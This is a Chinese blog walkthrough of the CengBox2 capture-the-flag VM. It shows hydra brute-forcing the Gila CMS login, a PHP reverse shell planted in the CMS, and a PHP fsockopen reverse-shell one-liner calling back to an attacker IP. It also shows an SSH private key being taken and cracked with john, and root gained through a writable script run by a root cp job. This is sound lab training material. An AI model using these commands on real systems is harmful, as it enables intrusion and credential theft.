cengbox2靶机(hydra爆破、公私钥免密登录)

最新推荐文章于 2023-03-31 15:45:40 发布
最新推荐文章于 2023-03-31 15:45:40 发布
阅读量544 收藏 4
点赞数 2
分类专栏: Box系列 文章标签: php linux bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/128205522
版权

环境准备

靶机链接:百度网盘 请输入提取码

提取码:zdpr

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.arp-scan -l探测目标靶机ip

2.nmap -p- -A -T4 192.168.1.107

探测目标靶机开放端口和服务

3.gobuster dir -u http://192.168.1.107 -w /usr/share/wordlists/dirb/big.txt -t 50

用gobuster扫描目录,啥也没有

漏洞探测

1.登录ftp,将note.txt下载下来

2.得到俩个名字kevin Aaron 和一个域名

3.把域名添加到/etc/hosts

4.wfuzz -H 'HOST: FUZZ.ceng-company.vm' -u 'http://ceng-company.vm/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 53,76

用wfuzz进行子域名探索 --hw是不搜集53,76 扫出的admin添加到/etc/hosts

5.gobuster dir -u http://admin.ceng-company.vm \ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

扫描子域目录,发现gila

6.gobuster dir -u http://admin.ceng-company.vm/gila -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50

扫描查出gila下的目录

7.尝试sql注入失败,用暴力破解,根据note.txt文件大概知道用户名是邮箱格式

8.hydra -l kevin@ceng-company.vm -P /usr/share/wordlists/rockyou.txt admin.ceng-company.vm http-post-form '/gila/admin/:username=kevin@ceng-company.vm&password=^PASS^:Wrong email or password' -vV -f

9.很尴尬我破解出来的密码居然是love4eva ,因为这个过程很漫长,我开启天眼模式已经知道密码admin,并登录进去。

我做完靶机之后再访问网页的时候用love4eva登录一下,神奇的事情发生了,网页居然找不到了,还报错!!可能这个用户有俩密码把。

漏洞利用

1.把index.php页面改成php-reverse-shell.php(自行谷歌可以找到)的内容

2.点击报错,成功反弹shell,看到swartz有些权限

3.看了看好像啥也没有,自己存侥幸心理sudo -l 一下,他还真有!

(swartz) NOPASSWD: /home/swartz/runphp.sh

4.他可以不需要密码就可以执行这个文件

sudo -u swartz /home/swartz/runphp.sh

发现进入了一个php命令里,那就直接反弹shell把!(自行谷歌php reverse shell)

php -r '$sock=fsockopen("192.168.1.106",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

权限提升

1.进入之后,进入mitnick,发现.ssh文件夹,存放公私钥的地方!

2.python3 -m http.server

wget http://192.168.1.107:8000/id_rsa

开放8000端口,下载下来私钥,进行ssh登录

3.john --wordlist=/usr/share/wordlists/rockyou.txt hash

发现登录的时候要密码,那用john破解下得到密码 legend

4.ssh mitnick@192.168.1.107 -i id_rsa

再次登录还报错,给私钥400权限就行了

5.查看以suid权限执行命令的文件,没有可以利用的

find / -perm -u=s -type f 2>/dev/null

我看好多博主用的find / -type f -perm -g+rwx 2>/dev/null 这个命令,也是可以的 查找用户组下rwx权限

6.上传pspy64检查程序,发现一个以root权限执行的命令cp

7.分别查看这俩个文件

8.这个权限挺高,满权限

9.把提权命令写进去

10.写入后查看,退出去,重新登录

11./bin/bash -p 成功提权

成功拿到root.txt,成功拿下!!!

魏钦6666
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
rockyou.txt.zip
06-24
1400万+密码、平时自己用、还是能够破解大部分的密码的
Kali自带密码字典rockyou.txt解压
热门推荐
weixin_44802617的博客
09-13 1万+
近期使用了airmon-ng进行wifi密码破解,虽然抓到了包,但是由于kali自带wifite.txt太弱,未能匹配出密码,因此我使用了rockyou.txt。起初rockyou.txt是未解压的状态,名称为rockyou.txt.gz,位于/usr/share/wordlists文件夹中。此处只说明其解压方法,有效性另说。一般来说破译需要针对性的字典,而不是数据量庞大的字典,毕竟计算机计算能力是有限的。另外,如果想建立自己专属的密码字典,可以尝试使用crunch工具。
broken靶机(计划任务提权)
m0_66299232的博客
11-27 369
9.虽然可以利用,但是他这个脚本只能看,不能改,然而之前的script文件夹可是满权限,那么就可以让这个log.py文件改名,让我们自己写的脚本变为log.py。5.这个root下面也有一个backup.py 应该是一样的脚本,根据前面的脚本信息,把/root写入path.txt就能把root目录给复制一份。3.查看path.txt啥也没有,退到根目录下(/和~不是一个目录)查看到一个backup.py的脚本。5.反弹成功之后,查看家目录下的alice用户,发现script目录是一个满权限的文件夹。
【甄选靶场】Vulnhub百个项目渗透——项目十:stapler-1(文件上传,多方式提权)
人间体佐菲的博客
09-06 852
网络安全,渗透测试,网络空间安全
靶场练习第十二天~vulnhub靶场之dc-4
qq_57976347的博客
02-11 469
一、准备工作 1.靶机下载链接 链接: 百度网盘 请输入提取码 提取码: 3hq4 2.用ifconfig查看kali的ip 二、信息收集 1.nmap的信息收集 (1)主机发现 命令:nmap 192.168.101.0/24 (2)扫描靶机详细信息 发现主机 192.168.101.117,判定为DC-4靶机,继续使用nmap命令获取靶机开放端口及其协议 命令:nmap -A 192.168.101.117 该靶机开放80和22端口,访问一下它的网页:http:
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
靶机综合渗透环境(zico2手册).pdf
04-07
靶机综合渗透环境——zico2渗透实战
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
rockyou.txt
03-24
kali自带的口令字典,rockyou.txt,大概有1400多万条口令,无重复口令。
CengBoxV1渗透笔记】
勿山几已
03-20 268
记录vulnhub靶场CengBoxV1的渗透过程
解压john自带的字典rockyou.txt
wo41ge的博客
12-16 3050
当我们提取rockyou.txt时 emm 对 提取失败了 当我们上命令行时 对 也失败了 这里记录一个命令 gzip -d rockyou.txt.gz 解压成功 贼快 我傻逼了 我以为它坏了…
Dr4g0n-b4ll靶机总结
qq_45301512的博客
01-29 466
靶机下载地址:打开靶机,使用nmap扫描靶机的ip和所有开放的端口可以看到靶机开放了80端口和22端口根据80端口打开网站信息收集,目录爆破在robots.txt下发现一串base64编码解码之后,显示你发现了隐藏的目录,但是这个隐藏的目录还不知道在哪这里要么得需要字典好,能够跑出来要么就可能作者给出提示然后通过查看源代码,发现在源代码的最下面,有一行base64编码经过三次解码之后获得了DRAGON BALL这个东西很有可能就是隐藏目录。
Kali字典正确使用姿势
zegeai的博客
01-24 8167
0x01 Wordlists 终端输入wordlists,可以查看自带字典。ls -al 查看具体路径 /usr/share/wordlists/目录下带了rockyou的字典。2009年一家名叫rockyou的司遭到了黑客攻击,他们的密码列表以明文存储,黑客下载了所有的密码列表并且开。rockyou.txt包含14341564个唯一密码,用于32603388个帐户。 rockyou.txt被压缩,需要解压才能够使用 gzip -d /usr/share/wordlists/rockyou.txt
CengBox3渗透笔记
勿山几已
03-31 447
这是cengbox系列靶机的第三个,也就是最后一个,这三个靶机难度恰好覆盖简单、中等、困难不同阶段,都做一下能感受到不同难度靶机的情况。
CengBox2渗透笔记】
勿山几已
03-23 283
本文仅用于技术讨论与研究,不做任何导向,对于所有笔记中复现的这些终端、服务器或者实验环境,均为自行搭建的开靶场,请勿在现实环境中模仿、操作。本文涉及到的工具仅就用到的方面做简要描述,如果想了解更详细的信息,请自行参阅其他技术资料。如果列出的技术用于其他任何目标,作者概不负责。
Hydra 爆破ssh
qq_43757105的博客
10-23 3164
目录 Centos7开启ssh服务 在Kali中生成一个4位数的密码字典 用Hydra爆破靶机centos7的密码 Centos7开启ssh服务 SSH配置看博客 查看ssh服务开启状态:systemctl status sshd.service 开启ssh服务:systemctl start sshd.service 检查一下22端口是否开启:netstat -an | grep 22 在Kali中生成一个4位数的密码字典 用Hydra爆破靶机c...
cengBox靶机wp
m0_52496313的博客
08-05 379
cengBox靶机wp

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值